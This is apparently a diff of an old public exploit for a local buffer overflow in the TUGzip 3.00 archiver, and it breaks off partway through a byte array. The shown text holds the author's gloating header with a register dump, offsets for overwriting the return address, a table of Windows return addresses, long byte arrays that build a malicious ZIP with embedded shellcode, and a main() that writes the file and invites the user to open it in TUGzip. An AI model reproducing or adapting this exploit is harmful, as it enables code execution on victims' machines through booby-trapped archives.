- "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
- "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
- "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
- "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
- "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
- "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
- "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
- "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
- "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
- "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
- "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
- "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
- "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
- "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
- "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
-
- struct addresses
- { char *platform;
- unsigned long addr;
- }
- targets[]=
- {
-
- { "[*]Microsoft Windows XP 5.1.1.0 SP1 (IA32)English(jmp esp)",0x778eadcf },
- { "[*]Microsoft Windows Pro sp3 English (call esp)",0x7C8369F0 },
- { "[*]Microsoft Windows Pro sp3 English (jmp esp)",0x7C86467B },
- { "[*]Windows XP 5.1.2.0 SP2 (IA32) English 
(jmp esp)",0x7d184de7 },
- { "[*]Windows XP 5.1.2.0 SP2 (IA32) German (jmp esp)",0x77d85197 },
- { "[*]Windows 2000 5.0.1.0 SP1 (IA32) English (jmp esp)",0x69952208 },
- { "[*]Crash the program",0x58585858 },
- {NULL }
- };
-
- int main(int argc,char *argv[])
- { FILE *h;
- char *buffer;
- buffer=(char *)malloc(sizeof(file_1)+sizeof(file_2));
- unsigned int offset=0;
- int number;
- unsigned int retaddress=targets[atoi(argv[2])].addr;
- if(argc<2)
- { printf("# \tChose your Platform #\n");
- for(int i=0;targets[i].platform;i++)
- printf("%d \t\t %s\n",i,targets[i].platform);
- printf("\tUsage is:\n");
- printf(argv[0]);
- printf(".exe ");
- printf("filename.zip ");
- printf("platform\n");
- printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");
-
- system("color 02");
- Sleep(2000);
- return 0;
- }
-
- if((h=fopen(argv[1],"wb"))==NULL)
- { printf("error\n");
- exit(0);
- }
-
- memcpy(buffer,file_1,sizeof(file_1)); offset=sizeof(file_1);
- memcpy(buffer+offset-1,file_2,sizeof(file_2)); offset=OFFSET;
- memcpy(buffer+offset,&retaddress,4); offset=0; offset=NOP;
- memset(buffer+offset,0x90,20);
-
- printf("#___________________________________________________________________________#\n");
- printf("Now chose your shellcode \n");
- printf("Press [1] for Alphanumeric shellcode\n");
- printf("Press [2] for NonAphanumeric shellcode\n");
- printf("#___________________________________________________________________________#\n");
-
- scanf("%d",&number);
- switch(number)
- { case 1:
- offset=shellcode_offset;
- memcpy(buffer+offset,shellcode_1,sizeof(shellcode_1));
- case 2:
- offset=shellcode_offset;
- memcpy(buffer+offset,shellcode_2,sizeof(shellcode_2));
- }
- fwrite(buffer,1,sizeof(file_1)+sizeof(file_2),h);
- printf("Building file ...\n");
- printf("Done ! 
Open with TUGzip and see what happens :) \n");
- printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");
- fclose(h);
- free(buffer);
-return 0;
- }
-
-// milw0rm.com [2008-10-24]
+/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow
+ "If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa"(JK)
+ Well hello there ,greetz from Romania,here is a exploit for the archiver TUGzip.
+ So the payload doesen't always execute,it's just a matter of patience,from 10
+ attemps you get success on 2 in the best case.Got 3 more archivers with stack
+ overflow and heap overflow,I'm bored... I'm looking for a new approach,will see
+ soon what I'm going to bring you.
+ "Let's put a smile on that face Mhaaaaaaaaahhaaahaaahhhhhhaaaaaaaaaaaaaaaaaa"
+ Credits go to Stefan Marin or fl0 fl0w :) .
+ All the best !
+
+Registers
+EAX 00000000
+ECX 00000064
+EDX 0013F6D0
+EBX 0117ABDC
+ESP 0013F6D0
+EBP 45444342
+ESI 0117AF6C
+EDI 00D88B1C
+EIP 58585858
+
+SEH chain of main thread, item 0
+ Address=0013F6D0
+ SE handler=C9C9C9C9
+
+*/
+#include
+#include
+#include
+#include
+
+#define OFFSET 2504
+#define NOP 2515
+#define shellcode_offset 2535
+
+
+char file_1[]=
+ "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08\x00\x00\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x66\x66\x64\x73\x75\x69\x62\x7A\x65\x6F\x69\x76\x7A\x20\x66\x68"
+"\x65\x6F\x20\x79\x66\x6F\x7A\x69\x61\x71\x20\x6F\x69\x65\x61\x7A"
+"\x75\x20\x7A\x71\x6F\x66\x68\x75\x65\x7A\x71\x6F\x69\x65\x6E\x66"
+"\x65\x7A\x6A\x75\x71\x63\x62\x75\x71\x70\x7A\x61\x7A\x69\x27\x74"
+"\x75\x72\x65\x6F\x7A\x6E\x62\x69\x6A\x75\x76\x62\x67\x73\x64\x75"
+"\x69\x71\x79\x72\x7A\x61\x6A\x20\x62\x63\x73\x64\x6F\x70\x69\x75"
+"\x72\x79\x7A\x6F\x65\x61\x71\x6E\x62\x69\x6F\x64\x73\x79\x72\x66"
+"\x65\x7A\x71\x6F\x69\x70\x62\x75\x66\x63\x73\x71\x69\x75\x79\x72" +"\x61\x7A\x62\x69\x6A\x65\x66\x62\x68\x73\x75\x69\x71\x76\x64\x73" +"\x71\x69\x6A\x62\x66\x65\x7A\x71\x75\x61\x66\x64\x64\x64\x64\x64" +"\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x68\x68" +"\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x75\x75\x75" +"\x75\x75\x75\x75\x75\x75\x75\x75\x68\x76\x71\x24\x69\x66\x72\x7A" +"\x65\x6F\x62\x76\x69\x6F\x7A\x65\x71\x66\x74\x72\x65\x6F\x7A\x71" +"\x6A\x6E\x62\x76\x64\x73\x70\x69\x79\x75\x66\x71\x6F\x65\x69\x68" +"\x66\x72\x6F\x75\x65\x7A\x68\x61\x72\x62\x20\x69\x76\x66\x64\x73" +"\x70\x6F\x68\x6A\x72\x65\x71\x6F\x75\x68\x66\x7A\x65\x61\x71\x75" +"\x68\x76\x71\x6F\x75\x68\x65\x66\x6F\x71\x73\x69\x6A\x68\x64\x6F" +"\x73\x71\x68\x76\x64\x6F\x69\x68\x7A\x61\x71\x6F\x65\x69\x68\x66" +"\x64\x73\x6F\x69\x75\x68\x76\x63\x78\x77\x69\x75\x68\x66\x71\x6F" +"\x75\x69\x68\x76\x77\x78\x6F\x69\x68\x66\x64\x73\x71\x6F\x69\x68" +"\x76\x64\x73\x71\x6F\x69\x75\x68\x7A\x67\x66\x6F\x69\x68\x73\x64" +"\x71\x6F\x69\x75\x68\x67\x7A\x65\x71\x6F\x69\x68\x67\x73\x71\x6F" +"\x69\x68\x67\x7A\x61\x65\x7A\x72\x75\x79\x61\x75\x79\x74\x61\x65" +"\x70\x69\x75\x79\x55\x59\x54\x4F\x5A\x52\x45\x50\x49\x48\x47\x41" +"\x5A\x55\x59\x56\x44\x53\x4F\x49\x59\x54\x41\x50\x4F\x49\x55\x45" +"\x59\x52\x49\x55\x45\x5A\x59\x47\x42\x4B\x4A\x43\x58\x4E\x4B\x56" +"\x4E\x4B\x43\x58\x42\x57\x56\x4B\x4A\x4E\x42\x43\x58\x48\x42\x4B" +"\x4A\x44\x48\x46\x4F\x49\x48\x5A\x45\x52\x4F\x49\x55\x48\x45\x5A" +"\x55\x49\x4F\x41\x42\x45\x5A\x55\x49\x42\x47\x55\x49\x56\x43\x50" +"\x4C\x44\x53\x47\x57\x4B\x52\x54\x42\x4E\x49\x55\x43\x49\x55\x4F" +"\x51\x45\x42\x48\x52\x55\x49\x59\x44\x46\x51\x50\x5A\x49\x55\x45" +"\x52\x50\x49\x55\x44\x59\x46\x54\x50\x41\x49\x5A\x55\x45\x59\x52" +"\x5A\x45\x55\x48\x52\x54\x49\x55\x50\x56\x58\x57\x4B\x4A\x43\x4E" +"\x48\x42\x47\x50\x46\x4F\x49\x55\x50\x41\x49\x52\x59\x45\x5A\x4F" +"\x41\x49\x54\x59\x38\x37\x33\x32\x39\x35\x36\x35\x39\x34\x38\x33" 
+"\x32\x36\x35\x46\x53\x34\x38\x59\x46\x44\x53\x39\x38\x59\x55\x56" +"\x47\x30\x39\x38\x51\x59\x55\x52\x30\x39\x38\x34\x59\x35\x32\x33" +"\x39\x38\x41\x59\x39\x46\x38\x45\x51\x59\x5A\x35\x39\x38\x59\x36" +"\x39\x38\x46\x47\x59\x39\x38\x51\x59\x39\x47\x46\x44\x53\x55\x59" +"\x30\x39\x48\x34\x5A\x48\x33\x37\x38\x35\x32\x33\x31\x42\x34\x47" +"\x38\x30\x47\x46\x44\x53\x55\x49\x42\x56\x51\x49\x55\x4F\x59\x50" +"\x52\x39\x5A\x48\x46\x44\x53\x51\x55\x49\x47\x46\x47\x44\x55\x53" +"\x53\x53\x53\x53\x45\x47\x46\x39\x32\x47\x35\x33\x34\x55\x47\x46" +"\x39\x49\x53\x50\x47\x42\x55\x54\x50\x5A\x39\x38\x59\x35\x33\x41" +"\x41\x42\x43\x43\x46\x52\x45\x43\x43\x45\x54\x52\x45\x5A\x47\x52" +"\x46\x44\x53\x49\x4F\x5A\x48\x45\x52\x42\x4E\x4F\x56\x46\x44\x53" +"\x4F\x49\x52\x48\x54\x4F\x5A\x49\x4E\x46\x47\x44\x4B\x4E\x46\x43" +"\x58\x4C\x4B\x59\x89\x05\x8A\x9B\x98\x98\x98\x4F\x49\x49\x49\x49" +"\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42" +"\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48" +"\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44" +"\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F\x4D\x4E\x4F\x4C\x36\x4B" +"\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x42\x36\x4B" +"\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45\x44\x4E\x43\x4B\x38\x4E" +"\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B\x48\x4F\x34\x4A\x51\x4B" +"\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49\x44\x4B\x38\x46\x43\x4B" +"\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49\x59\x4E\x4A\x46\x58\x42" +"\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D\x30\x41\x30\x44\x4C\x4B" +"\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A\x52\x45\x57\x45\x4E\x4B" +"\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48\x36\x4B\x58\x4E\x50\x4B" +"\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B\x4E\x43\x30\x4E\x52\x4B" +"\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41\x36\x43\x4C\x41\x43\x4B" +"\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B\x48\x42\x44\x4E\x50\x4B" +"\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42\x44\x4A\x30\x50\x45\x4A" 
+"\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42\x35\x4F\x4F\x48\x4D\x48" +"\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44\x33\x4A\x56\x47\x37\x43" +"\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42\x4D\x4A\x36\x4B\x4C\x4D" +"\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48\x4D\x4F\x45\x49\x58\x45" +"\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44\x30\x45\x35\x4C\x36\x44" +"\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49\x50\x45\x4F\x4D\x4A\x47" +"\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43" +"\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42\x4D\x48\x46\x4A\x56\x41" +"\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41\x4E\x45\x59\x4A\x46\x46" +"\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F\x4F\x48\x4D\x4C\x36\x42" +"\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x46\x4A\x4D\x4A\x50" +"\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43\x55\x45\x45\x4F\x4F\x42" +"\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49\x44\x47\x45\x4F\x4F\x48" +"\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F\x4F\x42\x4D\x43\x39\x4A" +"\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47\x45\x4F\x4F\x48\x4D\x45" +"\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46\x36\x48\x36\x4A\x56\x43" +"\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42\x45\x49\x35\x49\x32\x4E" +"\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49\x58\x44\x4E\x41\x43\x42" +"\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D\x32\x50\x4F\x44\x34\x4E" +"\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B\x4A\x4B\x4A\x4B\x4A\x4A" +"\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F\x4F\x45\x37\x46\x44\x4F" +"\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4C" +"\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4F\x4F\x42\x4D\x4A" +"\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43\x55\x4F\x4F\x48\x4D\x4C" +"\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42\x4D\x4B\x48\x47\x45\x4E" +"\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48\x4D\x44\x45\x4F\x4F\x42" +"\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F\x45\x43\x55\x4F\x4F\x48" +"\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" 
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61\x82\xFD\x81\x98\x98\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" 
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x2E\x74" +"\x78\x74\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC" +"\xCE\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08" +"\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" +"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45" +"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x43\x43\x43\x43\x43\x43\x43\x43\x43" +"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" 
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x41\x42\x43\x44\x45\x58\x58\x58\x58\x41\x41\x41\x41"; + + char file_2[]= +"\x41\x41\x41\x41\xCC\xCC\xCC\xCC\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4A\x4A\x4A\x4A\x4A\x4A" +"\x4A\x4A\x4A\x4A\x4A\x4A\x4A\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B" +"\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C" +"\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x4D\x4D\x4D\x4D\x4D\x4D\x4D\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E" +"\x4E\x4E\x4E\x4E\x4E\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4F\x4F\x4F\x4F" +"\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x50\x50\x50\x50\x50\x50" +"\x50\x50\x50\x50\x50\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x51\x51\x51\x51\x51\x51\x51" +"\x51\x51\x32\x32\x32\x32\x32\x89\x03\x59\x89\x05\x8A\x9B\x98\x98" 
+"\x98\x4F\x49\x49\x49\x49\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30" +"\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56" +"\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42" +"\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F" +"\x4D\x4E\x4F\x4C\x36\x4B\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F" +"\x4F\x4F\x4F\x42\x36\x4B\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45" +"\x44\x4E\x43\x4B\x38\x4E\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B" +"\x48\x4F\x34\x4A\x51\x4B\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49" +"\x44\x4B\x38\x46\x43\x4B\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49" +"\x59\x4E\x4A\x46\x58\x42\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D" +"\x30\x41\x30\x44\x4C\x4B\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A" +"\x52\x45\x57\x45\x4E\x4B\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48" +"\x36\x4B\x58\x4E\x50\x4B\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B" +"\x4E\x43\x30\x4E\x52\x4B\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41" +"\x36\x43\x4C\x41\x43\x4B\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B" +"\x48\x42\x44\x4E\x50\x4B\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42" +"\x44\x4A\x30\x50\x45\x4A\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42" +"\x35\x4F\x4F\x48\x4D\x48\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44" +"\x33\x4A\x56\x47\x37\x43\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42" +"\x4D\x4A\x36\x4B\x4C\x4D\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48" +"\x4D\x4F\x45\x49\x58\x45\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44" +"\x30\x45\x35\x4C\x36\x44\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49" +"\x50\x45\x4F\x4D\x4A\x47\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43" +"\x35\x43\x35\x43\x35\x43\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42" +"\x4D\x48\x46\x4A\x56\x41\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41" +"\x4E\x45\x59\x4A\x46\x46\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F" +"\x4F\x48\x4D\x4C\x36\x42\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A" +"\x56\x46\x4A\x4D\x4A\x50\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43" +"\x55\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49" 
+"\x44\x47\x45\x4F\x4F\x48\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F" +"\x4F\x42\x4D\x43\x39\x4A\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47" +"\x45\x4F\x4F\x48\x4D\x45\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46" +"\x36\x48\x36\x4A\x56\x43\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42" +"\x45\x49\x35\x49\x32\x4E\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49" +"\x58\x44\x4E\x41\x43\x42\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D" +"\x32\x50\x4F\x44\x34\x4E\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B" +"\x4A\x4B\x4A\x4B\x4A\x4A\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F" +"\x4F\x45\x37\x46\x44\x4F\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41" +"\x35\x41\x45\x41\x35\x4C\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41" +"\x45\x4F\x4F\x42\x4D\x4A\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43" +"\x55\x4F\x4F\x48\x4D\x4C\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42" +"\x4D\x4B\x48\x47\x45\x4E\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48" +"\x4D\x44\x45\x4F\x4F\x42\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F" 